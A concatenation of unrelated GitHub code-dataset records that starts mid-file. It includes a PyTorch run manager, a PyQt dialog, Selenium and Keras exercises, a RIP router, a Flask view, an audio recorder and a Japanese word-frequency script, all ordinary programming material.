cross_entropy_loss_with_soft_target\n\t\telif self.run_config.label_smoothing > 0:\n\t\t\tself.train_criterion = 
\\\n\t\t\t\tlambda pred, target: cross_entropy_with_label_smoothing(pred, target, self.run_config.label_smoothing)\n\t\telse:\n\t\t\tself.train_criterion = nn.CrossEntropyLoss()\n\t\tself.test_criterion = nn.CrossEntropyLoss()\n\t\t\n\t\t# optimizer\n\t\tif self.run_config.no_decay_keys:\n\t\t\tkeys = self.run_config.no_decay_keys.split('#')\n\t\t\tnet_params = [\n\t\t\t\tself.network.get_parameters(keys, mode='exclude'), # parameters with weight decay\n\t\t\t\tself.network.get_parameters(keys, mode='include'), # parameters without weight decay\n\t\t\t]\n\t\telse:\n\t\t\t# noinspection PyBroadException\n\t\t\ttry:\n\t\t\t\tnet_params = self.network.weight_parameters()\n\t\t\texcept Exception:\n\t\t\t\tnet_params = []\n\t\t\t\tfor param in self.network.parameters():\n\t\t\t\t\tif param.requires_grad:\n\t\t\t\t\t\tnet_params.append(param)\n\t\tself.optimizer = self.run_config.build_optimizer(net_params)\n\t\t\n\t\tself.net = torch.nn.DataParallel(self.net)\n\t\t\n\t\tif self.mode == 'generator':\n\t\t\t# PP\n\t\t\tsave_dir = f'{args.save_path}/predictor/model/ckpt_max_corr.pt'\n\n\t\t\tself.acc_predictor = pp.to('cuda')\n\t\t\tself.acc_predictor.load_state_dict(torch.load(save_dir))\n\t\t\tself.acc_predictor = torch.nn.DataParallel(self.acc_predictor)\n\t\t\tmodel = models.resnet18(pretrained=True).eval()\n\t\t\tfeature_extractor = torch.nn.Sequential(*list(model.children())[:-1]).to(self.device)\n\t\t\tself.feature_extractor = torch.nn.DataParallel(feature_extractor)\n\t\n\t\"\"\" save path and log path \"\"\"\n\t\n\t@property\n\tdef save_path(self):\n\t\tif self.__dict__.get('_save_path', None) is None:\n\t\t\tsave_path = os.path.join(self.path, 'checkpoint')\n\t\t\tos.makedirs(save_path, exist_ok=True)\n\t\t\tself.__dict__['_save_path'] = save_path\n\t\treturn self.__dict__['_save_path']\n\t\n\t@property\n\tdef logs_path(self):\n\t\tif self.__dict__.get('_logs_path', None) is None:\n\t\t\tlogs_path = os.path.join(self.path, 'logs')\n\t\t\tos.makedirs(logs_path, exist_ok=True)\n\t\t\tself.__dict__['_logs_path'] = logs_path\n\t\treturn self.__dict__['_logs_path']\n\t\n\t@property\n\tdef network(self):\n\t\treturn self.net.module if isinstance(self.net, nn.DataParallel) else self.net\n\t\n\tdef write_log(self, log_str, prefix='valid', should_print=True, mode='a'):\n\t\twrite_log(self.logs_path, log_str, prefix, should_print, mode)\n\t\n\t\"\"\" save and load models \"\"\"\n\t\n\tdef save_model(self, checkpoint=None, is_best=False, model_name=None):\n\t\tif checkpoint is None:\n\t\t\tcheckpoint = {'state_dict': self.network.state_dict()}\n\t\t\n\t\tif model_name is None:\n\t\t\tmodel_name = 'checkpoint.pth.tar'\n\t\t\n\t\tcheckpoint['dataset'] = self.run_config.dataset # add `dataset` info to the checkpoint\n\t\tlatest_fname = os.path.join(self.save_path, 'latest.txt')\n\t\tmodel_path = os.path.join(self.save_path, model_name)\n\t\twith open(latest_fname, 'w') as fout:\n\t\t\tfout.write(model_path + '\\n')\n\t\ttorch.save(checkpoint, model_path)\n\t\t\n\t\tif is_best:\n\t\t\tbest_path = os.path.join(self.save_path, 'model_best.pth.tar')\n\t\t\ttorch.save({'state_dict': checkpoint['state_dict']}, best_path)\n\t\n\tdef load_model(self, model_fname=None):\n\t\tlatest_fname = os.path.join(self.save_path, 'latest.txt')\n\t\tif model_fname is None and os.path.exists(latest_fname):\n\t\t\twith open(latest_fname, 'r') as fin:\n\t\t\t\tmodel_fname = fin.readline()\n\t\t\t\tif model_fname[-1] == '\\n':\n\t\t\t\t\tmodel_fname = model_fname[:-1]\n\t\t# noinspection PyBroadException\n\t\ttry:\n\t\t\tif 
model_fname is None or not os.path.exists(model_fname):\n\t\t\t\tmodel_fname = '%s/checkpoint.pth.tar' % self.save_path\n\t\t\t\twith open(latest_fname, 'w') as fout:\n\t\t\t\t\tfout.write(model_fname + '\\n')\n\t\t\tprint(\"=> loading checkpoint '{}'\".format(model_fname))\n\t\t\tcheckpoint = torch.load(model_fname, map_location='cpu')\n\t\texcept Exception:\n\t\t\tprint('fail to load checkpoint from %s' % self.save_path)\n\t\t\treturn {}\n\t\t\n\t\tself.network.load_state_dict(checkpoint['state_dict'])\n\t\tif 'epoch' in checkpoint:\n\t\t\tself.start_epoch = checkpoint['epoch'] + 1\n\t\tif 'best_acc' in checkpoint:\n\t\t\tself.best_acc = checkpoint['best_acc']\n\t\tif 'optimizer' in checkpoint:\n\t\t\tself.optimizer.load_state_dict(checkpoint['optimizer'])\n\t\t\n\t\tprint(\"=> loaded checkpoint '{}'\".format(model_fname))\n\t\treturn checkpoint\n\t\n\tdef save_config(self, extra_run_config=None, extra_net_config=None):\n\t\t\"\"\" dump run_config and net_config to the model_folder \"\"\"\n\t\trun_save_path = os.path.join(self.path, 'run.config')\n\t\tif not os.path.isfile(run_save_path):\n\t\t\trun_config = self.run_config.config\n\t\t\tif extra_run_config is not None:\n\t\t\t\trun_config.update(extra_run_config)\n\t\t\tjson.dump(run_config, open(run_save_path, 'w'), indent=4)\n\t\t\tprint('Run configs dump to %s' % run_save_path)\n\t\t\n\t\ttry:\n\t\t\tnet_save_path = os.path.join(self.path, 'net.config')\n\t\t\tnet_config = self.network.config\n\t\t\tif extra_net_config is not None:\n\t\t\t\tnet_config.update(extra_net_config)\n\t\t\tjson.dump(net_config, open(net_save_path, 'w'), indent=4)\n\t\t\tprint('Network configs dump to %s' % net_save_path)\n\t\texcept Exception:\n\t\t\tprint('%s do not support net config' % type(self.network))\n\t\n\t\"\"\" metric related \"\"\"\n\t\n\tdef get_metric_dict(self):\n\t\treturn {\n\t\t\t'top1': AverageMeter(),\n\t\t\t'top5': AverageMeter(),\n\t\t}\n\t\n\tdef update_metric(self, metric_dict, output, labels):\n\t\tacc1, acc5 = accuracy(output, labels, topk=(1, 5))\n\t\tmetric_dict['top1'].update(acc1[0].item(), output.size(0))\n\t\tmetric_dict['top5'].update(acc5[0].item(), output.size(0))\n\t\n\tdef get_metric_vals(self, metric_dict, return_dict=False):\n\t\tif return_dict:\n\t\t\treturn {\n\t\t\t\tkey: metric_dict[key].avg for key in metric_dict\n\t\t\t}\n\t\telse:\n\t\t\treturn [metric_dict[key].avg for key in metric_dict]\n\t\n\tdef get_metric_names(self):\n\t\treturn 'top1', 'top5'\n\t\n\t\"\"\" train and test \"\"\"\n\tdef validate(self, epoch=0, is_test=False, run_str='', net=None,\n\t data_loader=None, no_logs=False, train_mode=False, net_setting=None):\n\t\tif net is None:\n\t\t\tnet = self.net\n\t\tif not isinstance(net, nn.DataParallel):\n\t\t\tnet = nn.DataParallel(net)\n\t\t\n\t\tif data_loader is not None:\n\t\t\tself.data_loader = data_loader\n\t\t\n\t\tif train_mode:\n\t\t\tnet.train()\n\t\telse:\n\t\t\tnet.eval()\n\t\t\n\t\tlosses = AverageMeter()\n\t\tmetric_dict = self.get_metric_dict()\n\t\t\n\t\tfeatures_stack = []\n\t\twith torch.no_grad():\n\t\t\twith tqdm(total=len(self.data_loader),\n\t\t\t desc='Validate Epoch #{} {}'.format(epoch + 1, run_str), disable=no_logs) as t:\n\t\t\t\tfor i, (images, labels) in enumerate(self.data_loader):\n\t\t\t\t\timages, labels = images.to(self.device), labels.to(self.device)\n\t\t\t\t\tif self.mode == 'generator':\n\t\t\t\t\t\tfeatures = self.feature_extractor(images).squeeze()\n\t\t\t\t\t\tfeatures_stack.append(features)\n\t\t\t\t\t# compute output\n\t\t\t\t\toutput = 
net(images)\n\t\t\t\t\tloss = self.test_criterion(output, labels)\n\t\t\t\t\t# measure accuracy and record loss\n\t\t\t\t\tself.update_metric(metric_dict, output, labels)\n\t\t\t\t\t\n\t\t\t\t\tlosses.update(loss.item(), images.size(0))\n\t\t\t\t\tt.set_postfix({\n\t\t\t\t\t\t'loss': losses.avg,\n\t\t\t\t\t\t**self.get_metric_vals(metric_dict, return_dict=True),\n\t\t\t\t\t\t'img_size': images.size(2),\n\t\t\t\t\t})\n\t\t\t\t\tt.update(1)\n\t\t\t\t\t\n\t\tif self.mode == 'generator':\n\t\t\tfeatures_stack = torch.cat(features_stack)\n\t\t\tigraph_g = decode_ofa_mbv3_to_igraph(net_setting)[0]\n\t\t\tD_mu = self.acc_predictor.module.set_encode(features_stack.unsqueeze(0).to('cuda'))\n\t\t\tG_mu = self.acc_predictor.module.graph_encode(igraph_g)\n\t\t\tpred_acc = self.acc_predictor.module.predict(D_mu.unsqueeze(0), G_mu).item()\n\t\t\t\n\t\treturn losses.avg, self.get_metric_vals(metric_dict), \\\n\t\t pred_acc if self.mode == 'generator' else None\n\t\n\n\tdef validate_all_resolution(self, epoch=0, is_test=False, net=None):\n\t\tif net is None:\n\t\t\tnet = self.network\n\t\tif isinstance(self.run_config.data_provider.image_size, list):\n\t\t\timg_size_list, loss_list, top1_list, top5_list = [], [], [], []\n\t\t\tfor img_size in self.run_config.data_provider.image_size:\n\t\t\t\timg_size_list.append(img_size)\n\t\t\t\tself.run_config.data_provider.assign_active_img_size(img_size)\n\t\t\t\tself.reset_running_statistics(net=net)\n\t\t\t\tloss, (top1, top5) = self.validate(epoch, is_test, net=net)\n\t\t\t\tloss_list.append(loss)\n\t\t\t\ttop1_list.append(top1)\n\t\t\t\ttop5_list.append(top5)\n\t\t\treturn img_size_list, loss_list, top1_list, top5_list\n\t\telse:\n\t\t\tloss, (top1, top5) = self.validate(epoch, is_test, net=net)\n\t\t\treturn [self.run_config.data_provider.active_img_size], [loss], [top1], [top5]\n\t\n\tdef reset_running_statistics(self, net=None, subset_size=2000, subset_batch_size=200, data_loader=None):\n\t\tfrom ofa_local.imagenet_classification.elastic_nn.utils import set_running_statistics\n\t\tif net is None:\n\t\t\tnet = self.network\n\t\tif data_loader is None:\n\t\t\tdata_loader = self.run_config.random_sub_train_loader(subset_size, subset_batch_size)\n\t\tset_running_statistics(net, data_loader)\n","repo_name":"HayeonLee/MetaD2A","sub_path":"MetaD2A_mobilenetV3/database/run_manager.py","file_name":"run_manager.py","file_ext":"py","file_size_in_byte":10587,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"77"} +{"seq_id":"37637825724","text":"import sys\nimport os\n\nfrom widgetStyles.TextEdit import TextEdit\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot, QSize\nfrom PyQt5.QtGui import QFont, QIcon\n\n\nfrom designs.python.group_window import Ui_GroupWindow\n\nfrom utils.message import Message\n\nfrom database.model import Model\n\nfrom utils.helpers import StyleSheet, set_font\n\nfrom widgetStyles.Label import Label\nfrom widgetStyles.PushButton import PushButton\nfrom widgetStyles.Dialog import Dialog\nfrom widgetStyles.LineEdit import LineEdit\n\nclass GroupWindow(Ui_GroupWindow, QDialog):\n group_add_signal = pyqtSignal(bool)\n def __init__(self, group=None) -> None:\n super(GroupWindow, self).__init__()\n self.setupUi(self)\n self.read_styles()\n self.setWindowFlag(Qt.WindowContextHelpButtonHint, False)\n self.setWindowIcon(QIcon(\":/other/app_icon\"))\n self.group = group\n \n if 
self.group: self.fill_data()\n        \n        self.btn_discard.clicked.connect(self.close)\n        self.btn_save.clicked.connect(self.save)\n        \n    def read_styles(self):\n        widget_list = [Dialog, PushButton, Label, LineEdit, TextEdit]\n        \n        stylesheet = StyleSheet(widget_list).create()\n        self.setStyleSheet(stylesheet)\n        \n        font_list = [\n            self.lbl_description,\n            self.lbl_name,\n            self.lne_description,\n            self.lne_name,\n            self.btn_discard,\n            self.btn_save\n        ]\n        set_font(font_list)\n        \n    def fill_data(self):\n        self.lne_name.setText(self.group['name'])\n        self.lne_description.setText(self.group['description'])\n        self.btn_save.setText(\"Update\")\n        \n    @pyqtSlot()\n    def save(self):\n        name = self.lne_name.text()\n        description = self.lne_description.toPlainText()\n        \n        if not name:\n            Message(\"Please enter a name for the group\", \"Missing Group Name\").exec_()\n        \n        group = {\n            \"name\": name,\n            \"description\": description\n        }\n        \n        if not self.group:\n            Model().save(\"groups\", group)\n        else:\n            Model().update(\"groups\", group, self.group['id'])\n        self.group_add_signal.emit(True)\n        self.close()\n    \n    \n    \n    ","repo_name":"daniel-deru/WorkMate-3.0","sub_path":"windows/group_window.py","file_name":"group_window.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22238923368","text":"import random\r\nimport US as us\r\nimport EU as eu\r\nimport AS as asia\r\nimport ALL as all\r\nfrom random import randint as run\r\n\r\nprint(\"[////𝓒𝓒 𝓖𝓮𝓷 𝓫𝔂 @𝓞𝓷𝔂𝔂𝓣𝓱𝓮𝓑𝓮𝓼𝓽\\\\\\\\\\\\\\]\")\r\nprint(\"[1] US\")\r\nprint(\"[2] EU\")\r\nprint(\"[3] ASIA\")\r\nprint(\"[4] ALL\")\r\nselect1 = input(\"Select bin country: \")\r\nif select1 == \"1\":\r\n    us.generaUS()\r\nif select1 == \"2\":\r\n    eu.generaEU()\r\nif select1 == \"3\":\r\n    asia.generaAS()\r\nif select1 == \"4\":\r\n    all.generaALL()","repo_name":"OnyyTheBest/CC-GEN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29407329569","text":"#Algorithm to add natural numbers\n#The sum runs from 1 to N\n\n#Ask the user for a natural number\nnumero = int(input(\"Enter a natural number : \") )\n\n#Apply the formula\nsuma = (numero/2) * (numero+1)\n\n#Print the result\nprint(suma)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema1_ej1/tema1_ej1_aca352e1a4a5b448a93d844e71d52fa5.py","file_name":"tema1_ej1_aca352e1a4a5b448a93d844e71d52fa5.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44252853032","text":"import graphene\n\nfrom ..core.types import SortInputObjectType\n\n\nclass BookSortField(graphene.Enum):\n    TITLE = [\"title\", \"genre\"]\n    GENRE = [\"genre\", \"title\"]\n    ISBN = [\"isbn\", \"title\"]\n\n    @property\n    def description(self):\n        if self.name in BookSortField.__enum__._member_names_:\n            sort_name = self.name.lower().replace(\"_\", \" \")\n            return f\"Sort books by {sort_name}.\"\n        raise ValueError(\"Unsupported enum value: %s\" % self.value)\n\n\nclass BookSortingInput(SortInputObjectType):\n    class Meta:\n        sort_enum = BookSortField\n        type_name = 
\"books\"\n","repo_name":"theGleam/graphene-simple-book-list-api","sub_path":"book_list/graphql/book/sorters.py","file_name":"sorters.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35303220410","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n\n\n\nlink = 'http://suninjuly.github.io/file_input.html'\n#link = 'http://suninjuly.github.io/registration2.html' # bug\ntry: \n\tbrowser = webdriver.Chrome(executable_path=r'D:\\GoogleDrive\\chromedriver.exe') #executable_path=r'D:\\GoogleDrive\\chromedriver.exe'\n\tbrowser.get(link)\n\n\t# Ваш код, который заполняет обязательные поля\n\t\n\t\n\t\n\t#browser.execute_script(\"return arguments[0].scrollIntoView(true);\", button)\n\t\n\n\tinput1 = browser.find_element_by_name('firstname')\n\tinput1.send_keys(\"il\")\n\n\tinput1 = browser.find_element_by_name('lastname')\n\tinput1.send_keys(\"val\")\n\n\tinput1 = browser.find_element_by_name('email')\n\tinput1.send_keys(\"val@fake\")\n\n\tcurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\tfile_path = os.path.join(current_dir,'file.txt')\n\tinput1 = browser.find_element_by_id('file')\n\tinput1.send_keys(file_path)\n\n\n\t# Отправляем заполненную форму\n\tbutton = browser.find_element_by_css_selector(\"button.btn\")\n\tbutton.click()\n\n\t# Проверяем, что смогли зарегистрироваться\n\t# ждем загрузки страницы\n\t\n\nexcept Exception as error:\n print(f'Произошла ошибка, вот её трэйсбэк: {error}')\nfinally:\n\t# ожидание чтобы визуально оценить результаты прохождения скрипта\n\ttime.sleep(10)\n\t# закрываем браузер после всех манипуляций\n\tbrowser.quit()","repo_name":"ilnur2242/stepik_auto_tests_course","sub_path":"section2/task22_step8.py","file_name":"task22_step8.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"394824028","text":"from typing import Dict, Any\nimport csv\nimport pyaudio\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nCHUNK = 1024\nRECORD_SECONDS = 2\nFREQRANGE = 4000\n\nfor k in range (1):\n WAVE_OUTPUT_FILENAME = \"sample.wav\"\n audio = pyaudio.PyAudio()\n\n stream = audio.open(format=FORMAT, channels=CHANNELS,\n rate=RATE, input=True,\n frames_per_buffer=CHUNK)\n\n # start to listning to input\n print(\"Listeninig...for the \"+ str(k+1)+' th time')\n frames = []\n data = np.fromstring(stream.read(RATE*RECORD_SECONDS), dtype=np.int16) # read data 2 sseconds instead of chunk\n peak = np.average(np.abs(data)) * 2\n frames.append(data)\n\n datas = data * np.hanning(len(data)) # smooth the FFT by windowing data\n fft = abs(np.fft.fft(datas).real)\n fft = fft[:int(len(fft)/2)]\n\n freq = np.fft.fftfreq(RATE * RECORD_SECONDS, 1.0 / RATE) # check2 seconds frequency to find the maximum\n\n outFreq = (freq.tolist())[2:8001:2]\n outAmp =(fft.tolist())[2:8001:2]\n\n plt.plot(freq,fft)\n plt.axis([100,FREQRANGE,None, None])\n plt.xlabel('Audible Voice frequency')\n plt.ylabel(\"Ampltude\")\n plt.show()\n plt.close()\n\n print(\"Finished Listening...\")\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n waveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n waveFile.setnchannels(CHANNELS)\n waveFile.setsampwidth(audio.get_sample_size(FORMAT))\n waveFile.setframerate(RATE)\n waveFile.writeframes(b''.join(frames))\n 
waveFile.close()\n\n    extracter = []\n    counter = 0\n    extractAmp=[]\n    for i in range(100, 4000):\n        if outAmp[i] > 100000:\n            extracter.append(i)\n            extractAmp.append(outAmp[i])\n    mean = 0\n    maxFrequency = 0\n    varianceFreq = 0\n    size = len(extracter)\n    for j in range(0, size):\n        freqVal = extracter[j]\n        mean += freqVal\n        varianceFreq += freqVal ** 2\n        if freqVal > maxFrequency:\n            maxFrequency = freqVal\n    if size == 0:\n        varianceFreq = 0\n        mean = 0\n    else:\n        mean = mean / size\n        varianceFreq = (varianceFreq / size) - mean ** 2\n\n    statData = open('statdata.txt', 'r')\n    previous_data = (statData.read()).split('\\n')\n    statData.close()\n    open('statdata.txt', 'w').close()\n\n    if len(previous_data)<8:\n        previous_data=[0,0,0,0,mean,0,varianceFreq,0]\n\n    previous_data_size = int(previous_data[0])\n    previous_mean = float(previous_data[1])\n    previous_variance = int(float(previous_data[2]))\n    mean_max = int(float(previous_data[3]))\n    mean_min = int(float(previous_data[4]))\n    variance_max = int(float(previous_data[5]))\n    variance_min = int(float(previous_data[6]))\n    trainingSampleNumber = int(previous_data[7])+1\n\n    if mean_max<mean:\n        mean_max=mean\n    if mean_min>mean or mean_min==0:\n        mean_min=mean\n    if variance_max
', methods=['GET', 'POST'])\n@login_required_staff\ndef edit(id, yymm, dd):\n    item = AbsenceLog.get_or_404((id, yymm, dd))\n    form = AbsenseLogForm(obj=item)\n    if form.validate_on_submit():\n        form.populate_obj(item)\n        db.session.add(item)\n        try:\n            db.session.commit()\n            flash('欠席時対応加算記録を更新しました','success')\n            return redirect(url_for('absencelogs.index', yymm=yymm))\n        except Exception as e:\n            db.session.rollback()\n            flash('欠席時対応加算記録更新時にエラーが発生しました {}'.format(e), 'danger')\n            app.logger.exception(e)\n    return render_template('absencelogs/edit.pug', item=item, form=form)\n\n@bp.route('/<yymm>/report')\n@login_required_staff\ndef report(yymm):\n    with BytesIO() as output:\n        report = AbsenceLogReport(yymm)\n        report(output)\n        response = make_response(output.getvalue())\n        response.mimetype = 'application/pdf'\n        return response\n","repo_name":"abtoc/ofpp-app","sub_path":"flaskr/views/absencelogs.py","file_name":"absencelogs.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5348211607","text":"from keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras import layers\nimport random\nimport numpy as np\nimport cv2\n\nlabel_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n# Load the data\nnum_pixels = x_train.shape[1] * x_train.shape[2] * x_train.shape[3]\n\n# flattening the data from 3d (32x32x3) to 1d\n\nx_train = x_train.reshape((50000,32,32,3))\nx_train = x_train.astype('float32') / 255\nx_test = x_test.reshape((10000,32,32,3))\nx_test = x_test.astype('float32') / 255\n\n# Build the list of classes\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\n# Build the network model\nmodel = Sequential()\n\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.Flatten())\n# model.add(layers.Conv2D(32, (3, 3), activation='relu'))\n# model.add(layers.MaxPooling2D((2, 2)))\n# model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n# model.add(layers.Flatten())\n\nmodel.add(layers.Dense(10, activation='softmax'))\n\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# Train the model on the data\n# epoch - number of iterations\n# batch_size - number of training samples used in a single pass of the training function\nhistory = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=50, batch_size=500, verbose=1)\n\n# Evaluate the model\nscores = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\n\nmodel.summary()\n\n\nrandom_number = random.randint(0, 50000)\n\nresult = model.predict(x_train[random_number].reshape(1, 32, 32, 3), batch_size=1)\npredicted_class = np.where(result[0] == result[0].max())\nprint(label_names[predicted_class[0][0]])\n\ncv2.imshow('Check if the function works!!', x_train[random_number])\ncv2.waitKey(0)\n\n\n\n\n\n","repo_name":"pawelb95/PraktykaProgramowaniaPython","sub_path":"Keras exercise/Keras - Cifar exercise.py","file_name":"Keras - Cifar exercise.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25947080291","text":"from sim.api 
import *\nfrom sim.basics import *\n\n'''\nCreate your RIP router in this file.\nYanming & Beidi \nOct15 15:06\n'''\nclass RIPRouter (Entity):\n    def __init__(self):\n        \"\"\"\n        forwarding table is a dictionary, its key is the possible out_going path(port) it can choose, in other words, first row of the table; its value is a tuple containing the destination and the cost going from one particular port\n        \"\"\"\n        # Add your code here!\n        # key: dest; value: (port, distance)\n        self.forward = {}\n        # key: port; value: neighbor\n        self.dict = {}\n    \n    def handle_rx (self, packet, port):\n        # Add your code here!\n        if packet.__class__.__name__ == \"DiscoveryPacket\":\n            if packet.is_link_up:\n                self.forward[packet.src] = (port, 1)\n                self.dict[port] = packet.src\n            else:\n                self.forward[packet.src] = (port, 100)\n                self.dict[port] = packet.src\n            \n            update = RoutingUpdate()\n            for d in self.forward.keys():\n                update.add_destination(d, self.forward[d][1])\n            for pt in self.dict.keys():\n                if pt != port:\n                    self.send(update, pt, flood = False)\n        \n        elif packet.__class__.__name__ == \"RoutingUpdate\":\n            dests = packet.all_dests()\n            source = packet.src\n            flag = False\n            for d in dests:\n                if d == self:\n                    pass\n                else:\n                    neighbor = self.dict[port]\n                    distance = self.forward[neighbor][1]\n                    \n                    if d not in self.forward.keys():\n                        self.forward[d] = (port, distance + packet.get_distance(d))\n                        flag = True\n                    else:\n                        origin = self.forward[d][1]\n                        value = packet.get_distance(d) + distance\n                        if origin == value:\n                            ori_port = self.forward[d][0]\n                            if ori_port > port:\n                                self.forward[d] = (port, origin)\n                                flag = True\n                        elif origin > value:\n                            self.forward[d] = (port, value)\n                            flag = True\n            if flag:\n                update = RoutingUpdate()\n                for d in self.forward.keys():\n                    update.add_destination(d, self.forward[d][1])\n                for pt in self.dict.keys():\n                    if pt != port:\n                        self.send(update, pt, flood = False)\n        \n        else:\n            if packet.dst == self:\n                pass\n            else:\n                self.send(packet,self.forward[packet.dst][0], flood = False)\n\n\n","repo_name":"lucaschenex/Routing","sub_path":"rip_router_old.py","file_name":"rip_router_old.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40872781869","text":"import sys\nimport unicodedata\nimport argparse\nfrom collections import Counter\n\nfrom sudachi import analyze_single\n\nTOP_WORDS_COUNT = 2000\nKNOWN_AHEAD_COUNT = 100\nMAX_GOOD_SENTENCES = 20\nMAX_NEED_SENTENCES = 20\nMAX_LINES_TO_CHECK = 3_000_000\n\nFILTER_NORMALS = '''\nは\nの\nて\nに\nを\nが\nた\nだ\nと\nも\nで\nか\nです\nな\nよ\nない\nね\nから\nれる\nば\nって\nます\nけれど\nまで\nず\nわ\nへ\nし\nぞ\nてる\nられる\nとく\nけ\nふっ\nユー\nはあはあ\nさせる\n〞\nンンッ\nわっ\nあっ\nああ\nえっ\nんっ\nはあ\nうう\nあー\nおお\nおっ\nなあ\nうわ\nえー\nあれ\nはっ\nうー\nえーと\nへえ\nふふ\nくっ\nねえ\nわあ\nあはは\nあの\nむ\nふん\nいや\nいー\nふう\nふふふ\nきゃあ\nおー\nうお\nははは\nぎゃあ\nやあ\nうふふ\nんー\nほう\nおっと\nえい\nえへ\n'''\n\nFILTER_NORMALS_SET = set([s.strip() for s in FILTER_NORMALS.split('\\n') if s.strip()])\n\nKANA_KANJI_TABLE = dict.fromkeys(i for i in range(sys.maxunicode) if not any((s in unicodedata.name(chr(i), '') for s in ['KATAKANA', 'HIRAGANA', 'CJK'])))\ndef extract_kana_kanji(text):\n    return text.translate(KANA_KANJI_TABLE)\n\ndef include_for_refold(analysis):\n    (orig, fields_str, normal) = analysis\n\n    if not extract_kana_kanji(orig):\n        return False # no Japanese characters\n\n    if fields_str.startswith('名詞,固有名詞,'):\n        return False # name\n\n    if normal in FILTER_NORMALS_SET:\n        return False\n\n    return True\n\ndef find_sentences(target_normal, sorted_toks_fn, known_normals_set):\n    # so we can still 
target a word if it is known\n adjusted_known_normals_set = known_normals_set.copy()\n if target_normal in adjusted_known_normals_set:\n adjusted_known_normals_set.remove(target_normal)\n\n line_count = 0\n good_sents = []\n need_sents = []\n with open(sorted_toks_fn) as f:\n for line in f:\n line_count += 1\n sline = line.rstrip('\\n')\n\n (text, toks_str) = sline.split('\\t')\n\n toks_set = set(toks_str.split('|')) if toks_str else set()\n\n unknown_toks = toks_set.difference(adjusted_known_normals_set)\n\n if target_normal in unknown_toks:\n other_toks = unknown_toks.difference(set([target_normal]))\n all_others_known = (len(other_toks) == 0)\n if all_others_known:\n good_sents.append(text)\n else:\n need_sents.append(text + ' missing: ' + ', '.join(other_toks))\n\n if (len(good_sents) >= MAX_GOOD_SENTENCES) and (len(need_sents) >= MAX_NEED_SENTENCES):\n break\n if line_count >= MAX_LINES_TO_CHECK:\n break\n\n return (good_sents[:MAX_GOOD_SENTENCES], need_sents[:MAX_NEED_SENTENCES])\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('sortedtoks', help='tsv of (text, toks) sorted by descending goodness')\n parser.add_argument('freqtext', nargs='+', help='may have an integer specified like FN:WEIGHT')\n args = parser.parse_args()\n\n combined_normal_count = Counter()\n combined_normal_breakdown = {}\n\n sum_weights = 0\n for freqtext in args.freqtext:\n if ':' in freqtext:\n freqtext_fn, weight_str = freqtext.split(':')\n weight = int(weight_str)\n else:\n weight = 1\n freqtext_fn = freqtext\n sum_weights += weight\n\n analyses = [a for a in analyze_single(open(freqtext_fn).read()) if include_for_refold(a)]\n\n normal_count = Counter(normal for (orig, analysis, normal) in analyses)\n total_count = sum(normal_count.values())\n for (normal, count) in normal_count.items():\n combined_normal_count[normal] += weight*(count/total_count)\n\n normal_breakdown = {}\n for (orig, analysis, normal) in analyses:\n normal_breakdown.setdefault(normal, Counter())\n normal_breakdown[normal][(orig, analysis)] += 1\n for (normal, orig_analysis_counter) in normal_breakdown.items():\n total_count = sum(orig_analysis_counter.values())\n combined_normal_breakdown.setdefault(normal, Counter())\n for (orig_analysis, count) in orig_analysis_counter.items():\n combined_normal_breakdown[normal][orig_analysis] += weight*(count/total_count)\n\n known_set = FILTER_NORMALS_SET.copy()\n for (normal, _) in combined_normal_count.most_common(KNOWN_AHEAD_COUNT):\n known_set.add(normal)\n\n print('REPORT OF TOP %d WORDS' % TOP_WORDS_COUNT)\n print('NOTE: It is assumed that the first %d words are known from the beginning, so as to be able to find some sentences.' 
